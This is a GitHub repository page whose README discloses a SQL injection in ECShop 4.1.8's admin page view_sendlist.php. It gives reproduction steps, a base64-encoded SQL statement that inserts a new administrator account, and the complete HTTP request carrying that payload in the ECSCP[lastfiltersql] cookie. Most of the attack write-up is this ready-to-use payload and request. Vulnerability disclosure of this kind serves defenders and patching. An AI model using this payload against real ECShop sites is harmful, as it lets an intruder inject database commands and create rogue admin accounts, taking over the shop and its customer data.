Skip to content

curlyyyyyyyy/ecshop

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
README.md
README.md
 
 

Repository files navigation

ecshop

ECSHOP, 4.1.8, SQL Injection

Vulnerabilities Reproduction:

Log in to the backend, visit the view_ sendlist.php, and then capture the packet.

Enter the SQL statement to be executed, and then convert it into base64 encoding. Here we take adding the test administrator user as an example.

image

Here is the base64 encoding. aW5zZXJ0IGludG8gZWNzX2FkbWluX3VzZXIodXNlcl9uYW1lLGVtYWlsLHBhc3N3b3JkLGFjdGlvbl9saXN0LG5hdl9saXN0LGFnZW5jeV9pZCkgdmFsdWVzKCd0ZXN0JywnMTIzMTIzQDEyMy5jb20nLCc0ZmNlZDlhYTY2YzQzZTVmYzg3ZDVmOTE3NjIwMWViMycsJzEnLCcxJywnMScpOyM=

Get the value of ECSCP[lastfilterfile], here is F8F2F4EC.

Send the request package, and replace the previous cookie, or just add the following string to the original cookie. act=query&uselastfilter=1 ECSCP[lastfiltersql]=aW5zZXJ0IGludG8gZWNzX2FkbWluX3VzZXIodXNlcl9uYW1lLGVtYWlsLHBhc3N3b3JkLGFjdGlvbl9saXN0LG5hdl9saXN0LGFnZW5jeV9pZCkgdmFsdWVzKCd0ZXN0JywnMTIzMTIzQDEyMy5jb20nLCc0ZmNlZDlhYTY2YzQzZTVmYzg3ZDVmOTE3NjIwMWViMycsJzEnLCcxJywnMScpOyM=;ECSCP[lastfilterfile]=F8F2F4EC; Successfully executed SQL statement.

GET /ECShop_V4.1.13/ECShop/source/ecshop/admin/view_sendlist.php?act=query&uselastfilter=1 HTTP/1.1 Host: localhost:8888 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: loginNum=4; ECS_LastCheckOrder=Wed%2C%2011%20Jan%202023%2014%3A38%3A48%20GMT; ECS[visit_times]=13; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1672820048; PHPSESSID=c80bf1de9332905dbf330e4fc2929cc4; JSESSIONID=7BAE8239C62E8C6B4AC401F85773ACED; ECSCP_ID=d9c053c22fb93a4801ea199b40025da9ec8286d3;ECSCP[lastfiltersql]=aW5zZXJ0IGludG8gZWNzX2FkbWluX3VzZXIodXNlcl9uYW1lLGVtYWlsLHBhc3N3b3JkLGFjdGlvbl9saXN0LG5hdl9saXN0LGFnZW5jeV9pZCkgdmFsdWVzKCd0ZXN0JywnMTIzMTIzQDEyMy5jb20nLCc0ZmNlZDlhYTY2YzQzZTVmYzg3ZDVmOTE3NjIwMWViMycsJzEnLCcxJywnMScpOyM=;ECSCP[lastfilterfile]=F8F2F4EC; Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1

image image

Refresh the database and find that the user is successfully added, or the logged-in user finds that he can also log in successfully. image

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published